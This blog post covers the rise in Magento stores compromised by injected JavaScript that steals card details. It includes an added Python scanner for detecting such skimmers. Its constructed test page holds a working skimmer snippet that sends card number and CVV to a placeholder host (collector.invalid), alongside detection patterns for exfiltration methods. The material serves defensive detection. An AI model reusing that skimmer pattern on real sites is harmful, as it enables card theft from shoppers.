And now The Great Magento will saw your bank balance in half

Most of us will not have heard of Magento, but we should have.

Magento is an extremely popular eCommerce solution used globally by thousands of retailers big and small. The trouble, as usual with these solutions, is that many online retailers do not have the time, the inclination or the skills to patch their sites regularly, and often leave administration in the hands of third parties with no SLAs or even well-defined service parameters.

Yesterday we met with a number of very large UK based retailers who were discussing this very issue across smaller retailers. Serendipity strikes again.

Amsterdam based security researcher Willem de Groot has been scanning the Interwebs for a number of years looking for stores that are compromised to steal credit card details as they are entered online and ship them off to (guess where…) a Russian collection site to be grouped and sold on the Dark Web (mwahahaha) for $30 per card.

Here are his latest results (number of compromised stores found, and the increase on the Nov-15 figure):

Date    Compromised stores   Increase since Nov-15
Nov-15  3501                 -
Mar-16  4476                 28%
Sep-16  5925                 69%

It seems that this scam works by injecting JavaScript into the compromised store's pages, where it reads card details as they are typed and sends them to the collection site. There appear to be 9 varieties of malware in 3 distinct families with varying levels of sophistication and obfuscation.

This is very worrying for online safety and even though Google are doing something about it by blocking some of the malware on the Chrome Safe Browsing Blacklist, much of it remains undetected, unblocked and ready to harvest.

Mr de Groot has some great advice for compromised sites at his excellent blog on the subject here.

The most useful tip he has is for providers using Magento to check the status of their online presence using a free online service at: You could even use this tool to check the status of a boutique store you may be thinking of using, if you were an untrusting cynic like us!
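For store operators who want a local check in the meantime, here is an added example of the kind of heuristic scan that spots the two signals described above: an inline script that reads payment-form fields and sends them to a host that is not the store's own, and a script loaded from a host outside an operator-maintained allowlist. This is example code written for this post, not de Groot's scanner or Magento code; the field names, the sample pages and the allowlist are constructed for the demonstration and would need tuning to a real store.

```python
"""Heuristic scan of a store page for injected card-skimming JavaScript.

Added example, not code from the original post or from de Groot's tooling.
Signals checked (both described in the post):
  1. inline <script> that touches payment-form fields AND contains a way of
     sending data AND references a host other than the store's own;
  2. <script src=...> loading from a host not on the operator's allowlist.
All sample HTML, hostnames and field names below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer has to read to get card data (constructed list;
# extend with the names your checkout form actually uses).
CARD_FIELD_RE = re.compile(r"(cc_number|card_number|cardnumber|cvv|cvc|cc_cid|expir)", re.I)
# Browser-side ways of sending data to a third party.
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(|\.src\s*=)", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_page(html, store_host, allowed_hosts):
    """Return a list of (finding, host) tuples; an empty list means nothing flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname      # None for relative paths like /js/a.js
        if host and host != store_host and host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in parser.inline:
        touches_card = bool(CARD_FIELD_RE.search(body))
        sends = bool(EXFIL_RE.search(body))
        foreign = [h for h in (urlparse(u).hostname for u in URL_RE.findall(body))
                   if h and h != store_host and h not in allowed_hosts]
        if touches_card and sends and foreign:
            findings.append(("inline-skimmer", foreign[0]))
    return findings


# Constructed sample pages: a clean checkout, and the same page with a
# three-line injected script of the kind the post describes.
CLEAN_PAGE = """<html><body>
<form id="checkout"><input name="cc_number"><input name="cc_cid"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example-store.test/lib.js"></script>
</body></html>"""

SKIMMED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
(function(){var f=document.getElementById('checkout');
f.addEventListener('submit',function(){var d=f.cc_number.value+'|'+f.cc_cid.value;
new Image().src='https://collector.invalid/p?d='+btoa(d);});})();
</script></body>""")

if __name__ == "__main__":
    allow = {"cdn.example-store.test"}
    print("clean   :", scan_page(CLEAN_PAGE, "example-store.test", allow))
    print("skimmed :", scan_page(SKIMMED_PAGE, "example-store.test", allow))
```

Run it against the HTML your store actually serves to a browser (after any server-side templating), not the theme files on disk, since injected code usually lives in the database or in a modified file and only shows up in the rendered page. Obfuscated variants will evade the field-name regex, so treat a clean result as "nothing obvious" rather than "safe", and keep the external-host allowlist short and deliberately maintained.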

When advised about their stores being vulnerable, some of the reported comments are almost amusing. Our favourite being “Thanks for your suggestion, but our shop is totally safe. There is just an annoying JavaScript error”.

If you run an online store, or have a friend who does, please check it out and advise them to look at de Groot’s blog.

As well as public awareness, another good thing to come from this announcement is that it stopped this blog being about Microsoft’s new policy of delivering all security patches in bundled form so you have to implement them all and can’t selectively test them for compatibility issues. Even writing that brought on a bout of yawning. Consider yourselves lucky.

If you would like to discuss online security or any information security issues, please contact us at: [email protected] or call us on 020 7517 3900.